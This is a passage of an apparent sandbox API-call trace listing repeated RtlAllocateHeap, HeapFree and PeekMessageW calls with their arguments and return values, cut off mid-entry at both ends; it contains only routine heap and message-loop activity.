returned 0x12ef700 [0121.057] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef840 [0121.057] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491978 [0121.058] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491978 | out: hHeap=0x12c0000) returned 1 [0121.058] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef840 | out: hHeap=0x12c0000) returned 1 [0121.058] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef700 | out: hHeap=0x12c0000) returned 1 [0121.058] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458c58 [0121.058] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.058] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458c58 | out: hHeap=0x12c0000) returned 1 [0121.058] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.058] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.058] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12ff3c0 [0121.058] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd9a0 [0121.058] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0121.058] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0121.058] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd940 [0121.059] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd970 [0121.059] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7d0 [0121.059] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd9a0 | out: hHeap=0x12c0000) returned 1 [0121.059] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ff3c0 | out: hHeap=0x12c0000) returned 1 [0121.059] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd970 | out: hHeap=0x12c0000) returned 1 [0121.059] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7d0 | out: hHeap=0x12c0000) returned 1 [0121.059] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd940 | out: hHeap=0x12c0000) returned 1 [0121.059] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.059] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef810 [0121.059] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0121.059] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491a38 [0121.059] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491a38 | out: hHeap=0x12c0000) returned 1 [0121.059] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0121.059] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef810 | out: hHeap=0x12c0000) returned 1 [0121.059] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458bd8 [0121.060] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.060] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458bd8 | out: hHeap=0x12c0000) returned 1 [0121.060] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.060] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7d0 [0121.060] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8c0 [0121.060] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b18 [0121.060] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b18 | out: hHeap=0x12c0000) returned 1 [0121.060] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8c0 | out: hHeap=0x12c0000) returned 1 [0121.060] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7d0 | out: hHeap=0x12c0000) returned 1 [0121.060] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458a18 [0121.060] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.060] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458a18 | out: hHeap=0x12c0000) returned 1 [0121.060] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.061] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0121.061] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0121.061] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491818 [0121.061] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491818 | out: hHeap=0x12c0000) returned 1 [0121.061] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0121.061] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0121.061] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458ed8 [0121.061] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.061] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458ed8 | out: hHeap=0x12c0000) returned 1 [0121.061] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.061] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef800 [0121.061] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef860 [0121.061] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491858 [0121.061] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491858 | out: hHeap=0x12c0000) returned 1 [0121.061] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef860 | out: hHeap=0x12c0000) returned 1 [0121.061] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0121.061] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x14588d8 [0121.061] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.061] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14588d8 | out: hHeap=0x12c0000) returned 1 [0121.061] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.061] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef820 [0121.061] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0121.061] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x14919d8 [0121.061] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14919d8 | out: hHeap=0x12c0000) returned 1 [0121.061] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0121.061] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0121.062] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458cd8 [0121.062] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.062] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458cd8 | out: hHeap=0x12c0000) returned 1 [0121.062] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.062] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0121.062] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6f0 [0121.062] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491818 [0121.062] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491818 | out: hHeap=0x12c0000) returned 1 [0121.062] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6f0 | out: hHeap=0x12c0000) returned 1 [0121.062] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0121.062] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458ad8 [0121.062] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.062] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458ad8 | out: hHeap=0x12c0000) returned 1 [0121.062] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.062] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0121.062] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6f0 [0121.062] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b58 [0121.062] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b58 | out: hHeap=0x12c0000) returned 1 [0121.062] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6f0 | out: hHeap=0x12c0000) returned 1 [0121.062] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0121.063] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x14589d8 [0121.063] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.063] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14589d8 | out: hHeap=0x12c0000) returned 1 [0121.063] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.063] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0121.063] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef860 [0121.063] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x14919d8 [0121.063] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14919d8 | out: hHeap=0x12c0000) returned 1 [0121.063] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef860 | out: hHeap=0x12c0000) returned 1 [0121.063] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0121.063] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458858 [0121.063] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.063] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458858 | out: hHeap=0x12c0000) returned 1 [0121.063] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.063] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0121.063] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0121.063] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x14918b8 [0121.063] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14918b8 | out: hHeap=0x12c0000) returned 1 [0121.063] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0121.063] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0121.063] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458a58 [0121.063] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.063] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458a58 | out: hHeap=0x12c0000) returned 1 [0121.063] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.063] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7d0 [0121.063] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6f0 [0121.064] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b98 [0121.064] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b98 | out: hHeap=0x12c0000) returned 1 [0121.064] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6f0 | out: hHeap=0x12c0000) returned 1 [0121.064] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7d0 | out: hHeap=0x12c0000) returned 1 [0121.064] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x14589d8 [0121.064] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.064] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14589d8 | out: hHeap=0x12c0000) returned 1 [0121.064] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.064] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7d0 [0121.064] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0121.064] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x14918f8 [0121.064] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14918f8 | out: hHeap=0x12c0000) returned 1 [0121.064] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0121.064] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7d0 | out: hHeap=0x12c0000) returned 1 [0121.064] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458a98 [0121.064] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.064] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458a98 | out: hHeap=0x12c0000) returned 1 [0121.064] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.064] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7f0 [0121.064] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef860 [0121.064] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b18 [0121.064] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b18 | out: hHeap=0x12c0000) returned 1 [0121.064] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef860 | out: hHeap=0x12c0000) returned 1 [0121.064] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7f0 | out: hHeap=0x12c0000) returned 1 [0121.064] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458bd8 [0121.065] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.065] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458bd8 | out: hHeap=0x12c0000) returned 1 [0121.065] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.065] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef700 [0121.065] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6f0 [0121.065] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x14919d8 [0121.065] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14919d8 | out: hHeap=0x12c0000) returned 1 [0121.065] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6f0 | out: hHeap=0x12c0000) returned 1 [0121.065] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef700 | out: hHeap=0x12c0000) returned 1 [0121.065] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458858 [0121.065] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.065] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458858 | out: hHeap=0x12c0000) returned 1 [0121.065] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.065] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6f0 [0121.065] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef850 [0121.065] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491a18 [0121.065] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491a18 | out: hHeap=0x12c0000) returned 1 [0121.065] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef850 | out: hHeap=0x12c0000) returned 1 [0121.065] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6f0 | out: hHeap=0x12c0000) returned 1 [0121.065] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458858 [0121.065] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.065] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458858 | out: hHeap=0x12c0000) returned 1 [0121.065] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.065] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef820 [0121.065] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0121.065] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491a78 [0121.066] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491a78 | out: hHeap=0x12c0000) returned 1 [0121.066] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0121.066] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0121.066] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458858 [0121.066] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.066] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7f0 [0121.066] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd808 [0121.066] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7f0 | out: hHeap=0x12c0000) returned 1 [0121.066] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd9a0 [0121.066] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd718 [0121.066] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd760 [0121.066] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7d0 [0121.066] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd808 | out: hHeap=0x12c0000) returned 1 [0121.066] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0121.066] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0121.066] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd850 [0121.066] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0121.066] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd850 | out: hHeap=0x12c0000) returned 1 [0121.066] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0121.066] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef810 [0121.066] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd820 [0121.066] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef810 | out: hHeap=0x12c0000) returned 1 [0121.066] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd820 | out: hHeap=0x12c0000) returned 1 [0121.066] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd760 | out: hHeap=0x12c0000) returned 1 [0121.066] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7d0 | out: hHeap=0x12c0000) returned 1 [0121.066] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd718 | out: hHeap=0x12c0000) returned 1 [0121.066] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.067] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12ff050 [0121.067] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd898 [0121.067] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0121.068] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0121.068] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd838 [0121.068] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd988 [0121.068] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef810 [0121.068] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd898 | out: hHeap=0x12c0000) returned 1 [0121.068] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ff050 | out: hHeap=0x12c0000) returned 1 [0121.068] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd988 | out: hHeap=0x12c0000) returned 1 [0121.068] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef810 | out: hHeap=0x12c0000) returned 1 [0121.068] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd838 | out: hHeap=0x12c0000) returned 1 [0121.068] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.068] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8c0 [0121.068] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8c0 | out: hHeap=0x12c0000) returned 1 [0121.068] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.068] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458858 | out: hHeap=0x12c0000) returned 1 [0121.068] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.068] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0121.068] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7f0 [0121.068] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491878 [0121.068] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491878 | out: hHeap=0x12c0000) returned 1 [0121.068] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7f0 | out: hHeap=0x12c0000) returned 1 [0121.068] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, 